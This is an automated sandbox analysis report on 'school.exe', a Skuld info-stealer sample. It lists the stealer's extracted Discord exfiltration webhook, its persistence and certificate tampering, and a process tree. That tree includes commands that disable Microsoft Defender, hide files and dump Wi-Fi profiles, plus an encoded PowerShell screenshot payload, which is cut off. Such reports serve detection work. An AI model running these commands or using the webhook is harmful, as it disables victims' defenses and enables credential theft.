skuld | e8692661ffd0327708f581369c56af975a541c6565b97af794c8b7adfa297c15

Analysis

max time kernel
252s
max time network
220s
platform
windows11-21h2_x64
resource
win11-20240704-en
resource tags

arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system
submitted
09-07-2024 04:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

school.exe
Size

9.3MB
MD5

df99beb55f643551ae73184125d723ec
SHA1

9ea0ac60ec61a64dcb9eb21509b76ee8799434d5
SHA256

e8692661ffd0327708f581369c56af975a541c6565b97af794c8b7adfa297c15
SHA512

b5cf419550d3331cbc1ff32a78b9bcc4f5694bbf2de351bb4d6d6812d705726d5651306ce8a9ac7fec82ad3c3922228dc5c09e49daf5b65528b2e09a02227f98
SSDEEP

98304:sS+tg/BozXxWs0XHvLHMx3TN0E1eCFayKyY90xfm:7/BozXezHMx3Tv1eCFayNxm

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1260084983779823679/oksd2KHzMyoQZqqI4MwVE2vLGUihg1S0E0LXatDcQ1i1lpnsAwy_F34SoeRwH1q5WmA8

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
4684	powershell.exe
2136	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeschool.exeattrib.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	school.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

school.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2608496357-2693146533-2740208290-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	school.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
3	discord.com
5	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1	api.ipify.org
1	ip-api.com
2	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

school.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	school.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	school.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exewmic.exe

pid	Process
2908	wmic.exe
4784	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	4	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133649723214068309"	chrome.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

school.exe

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	school.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	school.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	school.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

school.exepowershell.exepowershell.exe

pid	Process
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
2136	powershell.exe
2136	powershell.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
756	powershell.exe
1808	school.exe
1808	school.exe
756	powershell.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe
1808	school.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

chrome.exe

pid	Process
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

school.exewmic.exewmic.exe

description	pid	Process
Token: SeDebugPrivilege	1808	school.exe
Token: SeIncreaseQuotaPrivilege	1748	wmic.exe
Token: SeSecurityPrivilege	1748	wmic.exe
Token: SeTakeOwnershipPrivilege	1748	wmic.exe
Token: SeLoadDriverPrivilege	1748	wmic.exe
Token: SeSystemProfilePrivilege	1748	wmic.exe
Token: SeSystemtimePrivilege	1748	wmic.exe
Token: SeProfSingleProcessPrivilege	1748	wmic.exe
Token: SeIncBasePriorityPrivilege	1748	wmic.exe
Token: SeCreatePagefilePrivilege	1748	wmic.exe
Token: SeBackupPrivilege	1748	wmic.exe
Token: SeRestorePrivilege	1748	wmic.exe
Token: SeShutdownPrivilege	1748	wmic.exe
Token: SeDebugPrivilege	1748	wmic.exe
Token: SeSystemEnvironmentPrivilege	1748	wmic.exe
Token: SeRemoteShutdownPrivilege	1748	wmic.exe
Token: SeUndockPrivilege	1748	wmic.exe
Token: SeManageVolumePrivilege	1748	wmic.exe
Token: 33	1748	wmic.exe
Token: 34	1748	wmic.exe
Token: 35	1748	wmic.exe
Token: 36	1748	wmic.exe
Token: SeIncreaseQuotaPrivilege	1748	wmic.exe
Token: SeSecurityPrivilege	1748	wmic.exe
Token: SeTakeOwnershipPrivilege	1748	wmic.exe
Token: SeLoadDriverPrivilege	1748	wmic.exe
Token: SeSystemProfilePrivilege	1748	wmic.exe
Token: SeSystemtimePrivilege	1748	wmic.exe
Token: SeProfSingleProcessPrivilege	1748	wmic.exe
Token: SeIncBasePriorityPrivilege	1748	wmic.exe
Token: SeCreatePagefilePrivilege	1748	wmic.exe
Token: SeBackupPrivilege	1748	wmic.exe
Token: SeRestorePrivilege	1748	wmic.exe
Token: SeShutdownPrivilege	1748	wmic.exe
Token: SeDebugPrivilege	1748	wmic.exe
Token: SeSystemEnvironmentPrivilege	1748	wmic.exe
Token: SeRemoteShutdownPrivilege	1748	wmic.exe
Token: SeUndockPrivilege	1748	wmic.exe
Token: SeManageVolumePrivilege	1748	wmic.exe
Token: 33	1748	wmic.exe
Token: 34	1748	wmic.exe
Token: 35	1748	wmic.exe
Token: 36	1748	wmic.exe
Token: SeIncreaseQuotaPrivilege	2908	wmic.exe
Token: SeSecurityPrivilege	2908	wmic.exe
Token: SeTakeOwnershipPrivilege	2908	wmic.exe
Token: SeLoadDriverPrivilege	2908	wmic.exe
Token: SeSystemProfilePrivilege	2908	wmic.exe
Token: SeSystemtimePrivilege	2908	wmic.exe
Token: SeProfSingleProcessPrivilege	2908	wmic.exe
Token: SeIncBasePriorityPrivilege	2908	wmic.exe
Token: SeCreatePagefilePrivilege	2908	wmic.exe
Token: SeBackupPrivilege	2908	wmic.exe
Token: SeRestorePrivilege	2908	wmic.exe
Token: SeShutdownPrivilege	2908	wmic.exe
Token: SeDebugPrivilege	2908	wmic.exe
Token: SeSystemEnvironmentPrivilege	2908	wmic.exe
Token: SeRemoteShutdownPrivilege	2908	wmic.exe
Token: SeUndockPrivilege	2908	wmic.exe
Token: SeManageVolumePrivilege	2908	wmic.exe
Token: 33	2908	wmic.exe
Token: 34	2908	wmic.exe
Token: 35	2908	wmic.exe
Token: 36	2908	wmic.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

chrome.exe

pid	Process
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

chrome.exe

pid	Process
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

school.exepowershell.execsc.exechrome.exe

description	pid	Process	procid_target
PID 1808 wrote to memory of 2180	1808	school.exe	81
PID 1808 wrote to memory of 2180	1808	school.exe	81
PID 1808 wrote to memory of 4832	1808	school.exe	82
PID 1808 wrote to memory of 4832	1808	school.exe	82
PID 1808 wrote to memory of 1748	1808	school.exe	83
PID 1808 wrote to memory of 1748	1808	school.exe	83
PID 1808 wrote to memory of 2908	1808	school.exe	85
PID 1808 wrote to memory of 2908	1808	school.exe	85
PID 1808 wrote to memory of 3324	1808	school.exe	86
PID 1808 wrote to memory of 3324	1808	school.exe	86
PID 1808 wrote to memory of 2136	1808	school.exe	87
PID 1808 wrote to memory of 2136	1808	school.exe	87
PID 1808 wrote to memory of 2352	1808	school.exe	88
PID 1808 wrote to memory of 2352	1808	school.exe	88
PID 1808 wrote to memory of 4784	1808	school.exe	89
PID 1808 wrote to memory of 4784	1808	school.exe	89
PID 1808 wrote to memory of 2336	1808	school.exe	90
PID 1808 wrote to memory of 2336	1808	school.exe	90
PID 1808 wrote to memory of 756	1808	school.exe	91
PID 1808 wrote to memory of 756	1808	school.exe	91
PID 1808 wrote to memory of 4824	1808	school.exe	92
PID 1808 wrote to memory of 4824	1808	school.exe	92
PID 1808 wrote to memory of 3956	1808	school.exe	93
PID 1808 wrote to memory of 3956	1808	school.exe	93
PID 1808 wrote to memory of 528	1808	school.exe	94
PID 1808 wrote to memory of 528	1808	school.exe	94
PID 1808 wrote to memory of 4684	1808	school.exe	95
PID 1808 wrote to memory of 4684	1808	school.exe	95
PID 4684 wrote to memory of 2220	4684	powershell.exe	96
PID 4684 wrote to memory of 2220	4684	powershell.exe	96
PID 2220 wrote to memory of 1560	2220	csc.exe	97
PID 2220 wrote to memory of 1560	2220	csc.exe	97
PID 1900 wrote to memory of 892	1900	chrome.exe	102
PID 1900 wrote to memory of 892	1900	chrome.exe	102
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103
PID 1900 wrote to memory of 5052	1900	chrome.exe	103

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
2180	attrib.exe
4832	attrib.exe
3956	attrib.exe
528	attrib.exe

C:\Users\Admin\AppData\Local\Temp\school.exe
"C:\Users\Admin\AppData\Local\Temp\school.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\school.exe
  2⤵
  - Views/modifies file attributes
  PID:2180
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:4832
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:2908
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:3324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\school.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2136
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:2352
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4784
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:756
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4824
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:3956
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYw